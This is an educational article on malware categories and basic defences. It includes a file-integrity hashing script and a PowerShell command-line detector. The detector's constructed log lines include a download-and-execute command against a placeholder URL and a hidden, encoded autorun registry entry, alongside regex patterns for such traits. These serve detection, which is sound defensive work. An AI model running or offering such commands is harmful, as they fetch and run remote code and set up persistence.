To combat malware, it’s important to get your malware classifications right. These are the different types of malware, and how to recognize them:
1. Virus
We tend to refer to all malware as viruses, but that is not accurate. A virus modifies other legitimate host files in such a way that when you execute the infected file on the victim’s system, you also execute the virus. Today, with so many other kinds of malware circulating, computer viruses have become rather uncommon; they comprise less than 10% of all malware.
Remember, viruses infect other files; they are the only malware that does so, and that is why they are so hard to clean up. Even the best antivirus programs struggle with this: most of the time they either delete or quarantine the infected file and do not remove the virus itself.
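Because a virus works by modifying legitimate host files, the practical way to notice one is to record a hash of every file you trust and re-check those hashes later. The following is an added example, not code from the original article: it builds a SHA-256 baseline of a directory, then reports files that were modified, added or removed. The files and the "infection" (a few bytes appended to one host file) are constructed in a temporary directory so the script runs offline.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root) -> dict:
    """Map every regular file under root (relative path) to its SHA-256."""
    root = Path(root)
    return {
        str(p.relative_to(root)): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_to_baseline(root, baseline: dict):
    """Return (modified, added, missing) relative paths versus a stored baseline."""
    current = build_baseline(root)
    modified = sorted(n for n in baseline if n in current and current[n] != baseline[n])
    added = sorted(n for n in current if n not in baseline)
    missing = sorted(n for n in baseline if n not in current)
    return modified, added, missing


def demo():
    """Constructed scenario: two trusted 'programs'; one is altered after the baseline."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "app.bin").write_bytes(b"legitimate program bytes")
        (root / "tool.bin").write_bytes(b"another legitimate program")
        baseline = build_baseline(root)

        # Simulate a host file being modified after the baseline was taken
        # (constructed: we simply append bytes to the existing file).
        with open(root / "app.bin", "ab") as f:
            f.write(b"<bytes that were not there before>")
        # A file that did not exist when the baseline was taken.
        (root / "new.bin").write_bytes(b"unknown new file")

        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    modified, added, missing = demo()
    print("modified:", modified)
    print("added:", added)
    print("missing:", missing)
```

The baseline must be stored somewhere the malware cannot rewrite (a read-only location or a separate host); a baseline kept next to the files it protects can be altered along with them.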
2. Worm
A worm is self-replicating and spreads without any end-user action, which is what makes it so devastating. Viruses need end users to launch them before they can go on to infect other files and systems; worms need no such action. They spread by themselves, self-replicating as they go and damaging systems, devices, networks and connected infrastructure. Worms spread by exploiting other files and programs to do the spreading work. When one person in an organization opens an email containing a worm, the entire network of the organization could be infected in just a few minutes.
3. Trojan
Trojans, named after the horse of the Trojan war, masquerade as legitimate programs but carry malicious instructions. Trojans mostly arrive via email or are picked up from infected websites that users visit. They only work when the victim executes them. A user may see a pop-up claiming that their system is infected and instructing them to run a program to clean it; they take the bait, not knowing that the program is a Trojan. Trojans are very common, partly because they are easy to write and partly because they spread by tricking end users into executing them, which effectively renders security software useless.
4. Ransomware
Ransomware, as the name suggests, demands a ransom from you to get things back on track. The main problem with ransomware, which can spread extremely fast across organizations, networks and countries, is that it encrypts all files on a system or network, rendering them inaccessible. A ransom note then pops up, demanding payment in cryptocurrency to decrypt the files. If the ransom is not paid, the encrypted files may eventually be destroyed, which is why ransomware should be seen as one of the most devastating forms of malware. Most ransomware is Trojan-based and spreads through social engineering. Unfortunately, in some cases hackers refuse to decrypt the files even after you pay the ransom.
5. Adware
Adware attempts to expose users to unwanted, potentially malicious advertising. These ads are likely to end up infecting a user’s device. Some adware programs redirect a user’s browser searches to look-alike web pages that promote other products. Removing adware is comparatively easy: find the malicious executable and remove it.
6. Spyware
Spyware, as the name suggests, helps hackers spy on systems and their users. This kind of malware can be used for keylogging and similar activities, giving hackers access to personal data (including login credentials) and intellectual property. Spyware is also used by people who want to monitor the computer activity of people they know personally. Spyware, like adware, is easy to remove.
7. File-less malware
While traditional malware travels and infects systems through the file system, file-less malware does so without directly using files or the file system. Such malware exploits and spreads in memory only; it also makes use of ‘non-file’ OS objects such as APIs and registry keys. File-less attacks are mostly initiated by exploiting an already-present legitimate program or by using legitimate tools built into the OS (for example, Microsoft’s PowerShell). This is what makes these attacks really tough to detect and prevent.
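Since file-less malware leaves no file to scan, defenders look instead at how the built-in tools were invoked: the command lines recorded by process-creation logging. The script below is an added example, not part of the original article, and its indicator patterns, scoring rule and log lines are all assumptions for the example. It flags PowerShell command lines that combine traits the passage describes (running purely in memory, fetching code over the network, hiding the window, or writing an autorun registry key). The four log entries are constructed, with a placeholder host name, a placeholder URL and a meaningless base64 string.

```python
import re
from typing import Dict, List

# Indicator patterns (assumed for this example) matched against process command lines.
INDICATORS: Dict[str, re.Pattern] = {
    "hidden_window":    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":    re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I),
    "encoded_command":  re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "in_memory_exec":   re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch":     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "autorun_registry": re.compile(r"currentversion\\run\b", re.I),
}

# Constructed process-creation log lines (placeholder host, URL and base64 payload).
B64_PLACEHOLDER = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
LOG_LINES = [
    "2024-01-01T10:00:01 host1 4688 powershell.exe -NoProfile -Command Get-Process",
    "2024-01-01T10:00:05 host1 4688 powershell.exe -w hidden -ep bypass -enc " + B64_PLACEHOLDER,
    "2024-01-01T10:00:09 host1 4688 powershell.exe -NoProfile -WindowStyle Hidden -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')\"",
    "2024-01-01T10:00:12 host1 4688 powershell.exe -Command Set-ItemProperty -Path "
    "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Updater "
    "-Value 'powershell -w hidden -enc " + B64_PLACEHOLDER + "'",
]


def score_line(line: str) -> List[str]:
    """Return the names of all indicators present in one log line."""
    return [name for name, pat in INDICATORS.items() if pat.search(line)]


def analyze(lines: List[str]) -> List[Dict]:
    """Flag a line when it carries an encoded command or two or more indicators together.

    A single indicator (e.g. a hidden window) is common in legitimate automation, so
    the rule requires a combination before marking the line suspicious.
    """
    results = []
    for n, line in enumerate(lines, 1):
        hits = score_line(line)
        results.append({
            "line_no": n,
            "hits": hits,
            "suspicious": "encoded_command" in hits or len(hits) >= 2,
        })
    return results


if __name__ == "__main__":
    for r in analyze(LOG_LINES):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"line {r['line_no']}: {flag} {r['hits']}")
```

On a real system the input would come from Windows Security event 4688 (with command-line auditing enabled) or a Sysmon process-creation log, and the rule thresholds would be tuned against the organization's own administrative scripts to keep false positives down.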
8. The hybrid attack
This kind is particularly dangerous and devastating. Today we have malware that combines more than one stream of traditional malware: for example, some malware is part virus, part Trojan and part worm. Such malware might appear as a Trojan in the initial stage, after which it spreads like a worm. There are also bots, where hackers use one kind of malware to gain access to hundreds of computers; those systems are then used (either by the same hackers or by others who purchase them) to carry out further attacks.
Combating malware: Some basic tips
These are some basic measures that help prevent malware infection to a great extent:
- Update the OS, browsers, plugins, etc. regularly.
- Use all the necessary security tools, chosen according to your requirements.
- Update all software regularly.
- Watch out for social engineering attacks and stay wary of phishing emails.
- Never click on links or download attachments coming from untrusted or unknown sources.
- Practice safe browsing.
- Use strong passwords and change them periodically.
- Refrain from using unencrypted public connections.
- Layer your security, starting with basic measures like a firewall and antivirus.